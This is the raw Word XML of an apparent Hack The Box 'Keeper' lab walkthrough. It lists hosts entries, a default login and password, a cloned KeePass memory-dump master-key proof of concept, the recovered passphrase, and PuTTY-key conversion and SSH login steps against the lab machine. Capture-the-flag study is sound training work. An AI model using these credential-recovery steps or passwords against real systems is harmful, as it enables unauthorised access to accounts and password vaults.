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1615" w14:textId="474C7302" w:rsidR="002A0BB3" w:rsidRDefault="00415C41">
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/hosts </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE4F4E8" w14:textId="44DCCB1C" w:rsidR="00415C41" w:rsidRDefault="00415C41">
      <w:r>
        <w:t xml:space="preserve">10.10.227.111 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keeper.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6568CF94" w14:textId="239CA2EE" w:rsidR="00415C41" w:rsidRDefault="00415C41">
      <w:r>
        <w:t xml:space="preserve">10.10.227.111 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tickets.keeper.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B2353CF" w14:textId="7668967A" w:rsidR="00E177F1" w:rsidRDefault="00E177F1">
      <w:r>
        <w:t>Default  user  (Root  password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2561B870" w14:textId="33001F8A" w:rsidR="00C30D51" w:rsidRDefault="00C30D51">
      <w:r>
        <w:t xml:space="preserve">Username: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C30D51">
        <w:t>lnorgaard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26C6B984" w14:textId="3363EE64" w:rsidR="00C30D51" w:rsidRDefault="00C30D51">
      <w:r>
        <w:t>Password :</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30D51">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C30D51">
        <w:t>Welcome2023!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2722F543" w14:textId="0327C4BD" w:rsidR="003A429B" w:rsidRDefault="003A429B"/>
    <w:p w14:paraId="27B33F62" w14:textId="577ADA2B" w:rsidR="003A429B" w:rsidRDefault="0082748D">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="00CD3E8E" w:rsidRPr="000E5019">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://keeweb.info/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2CAD93E2" w14:textId="7BED84A9" w:rsidR="00CD3E8E" w:rsidRDefault="00CD3E8E">
      <w:r>
        <w:t xml:space="preserve">upload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passcode.kb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="62074FB0" w14:textId="258916A8" w:rsidR="0005057B" w:rsidRDefault="0005057B">
      <w:r w:rsidRPr="0005057B">
        <w:t xml:space="preserve">git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00EA6D20" w:rsidRPr="000E5019">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/matro7sh/keepass-dump-masterkey.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="331C23B2" w14:textId="23F27AC7" w:rsidR="00EA6D20" w:rsidRDefault="00EA6D20">
      <w:r w:rsidRPr="00EA6D20">
        <w:t>python poc.py /home/neo/Keeper/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA6D20">
        <w:t>KeePassDumpFull.dmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA6D20">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3E9FC0" w14:textId="02276521" w:rsidR="00A616B4" w:rsidRDefault="00A616B4" w:rsidP="00A616B4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="105" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="272727"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="272727"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00A616B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="272727"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>ødgrød</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A616B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="272727"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> med </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A616B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="272727"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>fløde</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3C5F430F" w14:textId="76FDF449" w:rsidR="0091123B" w:rsidRDefault="0091123B" w:rsidP="0091123B">
      <w:r>
        <w:t>copy key in one file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16311BA5" w14:textId="54409531" w:rsidR="00CC3419" w:rsidRDefault="00CC3419" w:rsidP="0091123B">
      <w:r w:rsidRPr="00CC3419">
        <w:t xml:space="preserve">vim </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC3419">
        <w:t>key.ppk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CA85EED" w14:textId="0D4FCCE1" w:rsidR="00CC3419" w:rsidRDefault="00CC3419" w:rsidP="0091123B">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC3419">
        <w:t>puttygen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC3419">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC3419">
        <w:t>key.ppk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC3419">
        <w:t xml:space="preserve"> -O private-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC3419">
        <w:t>openssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC3419">
        <w:t xml:space="preserve"> -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC3419">
        <w:t>key.pem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="49738E08" w14:textId="18996242" w:rsidR="00EA248E" w:rsidRDefault="00EA248E" w:rsidP="0091123B">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA248E">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA248E">
        <w:t xml:space="preserve"> 400 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA248E">
        <w:t>key.pem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2BE1BED1" w14:textId="33D917D6" w:rsidR="00A616B4" w:rsidRDefault="0082748D">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0082748D">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0082748D">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0082748D">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0082748D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0082748D">
        <w:t>key.pem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0082748D">
        <w:t xml:space="preserve"> 10.10.11.227  </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A6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25"/>
    <w:rsid w:val="0005057B"/>
    <w:rsid w:val="000F7B9D"/>
    <w:rsid w:val="002A0BB3"/>
    <w:rsid w:val="003A429B"/>
    <w:rsid w:val="00415C41"/>
    <w:rsid w:val="004E18D0"/>
    <w:rsid w:val="005A699F"/>
    <w:rsid w:val="00695EEF"/>
    <w:rsid w:val="0082748D"/>
    <w:rsid w:val="0091123B"/>
    <w:rsid w:val="00A616B4"/>
    <w:rsid w:val="00C30D51"/>
    <w:rsid w:val="00CC3419"/>
    <w:rsid w:val="00CD3E8E"/>
    <w:rsid w:val="00E177F1"/>
    <w:rsid w:val="00E81F25"/>
    <w:rsid w:val="00EA248E"/>
    <w:rsid w:val="00E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BADA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6CEBAF2B-9C8E-4158-893B-075251BC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16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tro7sh/keepass-dump-masterkey.git" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://keeweb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2023-12-12T16:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-13T15:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>